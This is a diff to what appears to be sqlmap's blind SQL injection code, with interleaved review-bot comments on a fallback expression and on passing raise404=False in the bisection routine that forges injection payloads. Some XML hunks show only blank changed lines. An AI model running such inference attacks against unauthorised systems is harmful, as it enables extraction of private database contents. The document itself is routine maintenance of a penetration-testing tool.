diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 0ab144281..042c725f1 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -62,10 +62,7 @@ def setHandler():
 ( SYBASE_ALIASES, SybaseMap, SybaseConn ),
 ]
- if kb.htmlFp:
- inferencedDbms = kb.htmlFp[-1]
- else:
- inferencedDbms = None
+ inferencedDbms = (kb.htmlFp[-1] if kb.htmlFp else None) or kb.dbms
 for injection in kb.injections:
 if hasattr(injection, "dbms"):
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 7362d7815..b4f379fbc 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -127,7 +127,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, posValue))
 queriesCount[0] += 1
- result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 if result:
 return hintValue[idx-1]
@@ -161,7 +161,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if len(charTbl) == 1:
 forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, charTbl[0]))
 queriesCount[0] += 1
- result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 if result:
 return chr(charTbl[0]) if charTbl[0] < 128 else unichr(charTbl[0])
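Review bot: The new one-line assignment in setHandler() (lib/controller/handler.py) folds two fallbacks into one expression without saying which source wins: the last HTML error-page fingerprint takes precedence and `kb.dbms` is used only when there is no fingerprint. A comment above it, for example `# prefer the DBMS fingerprinted from HTML error pages, fall back to kb.dbms`, would make that ordering explicit. If `kb.dbms` can hold a value the operator set explicitly (not visible in this hunk), it is worth confirming that an error-page fingerprint should still override it. setHandler's body starts and ends outside the hunk.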
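Review bot: Passing `raise404=False` at the `Request.queryPage` call in bisection() (hunk at -127) means a 404 response is no longer raised but presumably fed into the comparison, so this call site cannot tell a page that legitimately answers 404 from a URL that has stopped resolving mid-run; in the second case the loop would likely keep returning wrong characters instead of stopping. How queryPage treats the flag is outside this diff, so that failure mode is inferred. The same keyword is added at five more call sites (hunks at -161, -181, -233, -433 and -457); a small local helper such as `def _query(p): return Request.queryPage(p, timeBasedCompare=timeBasedCompare, raise404=False)` would keep them in step. It would also give one place for a comment saying why 404 is tolerated during inference. bisection's body extends well outside every one of these hunks.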
@@ -181,7 +181,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(CHAR_INFERENCE_MARK, chr(posValue) if posValue < 128 else unichr(posValue))
 queriesCount[0] += 1
- result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 if result:
 minValue = posValue
@@ -233,7 +233,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
 forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, retVal))
 queriesCount[0] += 1
- result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 if result:
 return chr(retVal) if retVal < 128 else unichr(retVal)
@@ -433,7 +433,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
 query = agent.suffixQuery(query)
 queriesCount[0] += 1
- result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
 # Did we have luck?
 if result:
@@ -457,7 +457,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
 query = agent.suffixQuery(query)
 queriesCount[0] += 1
- result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare)
+ result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
 # Did we have luck?
 if result:
diff --git a/xml/queries.xml b/xml/queries.xml
index 1f38e3541..fb4717f54 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -335,7 +335,7 @@
-
+
@@ -352,7 +352,7 @@
-
+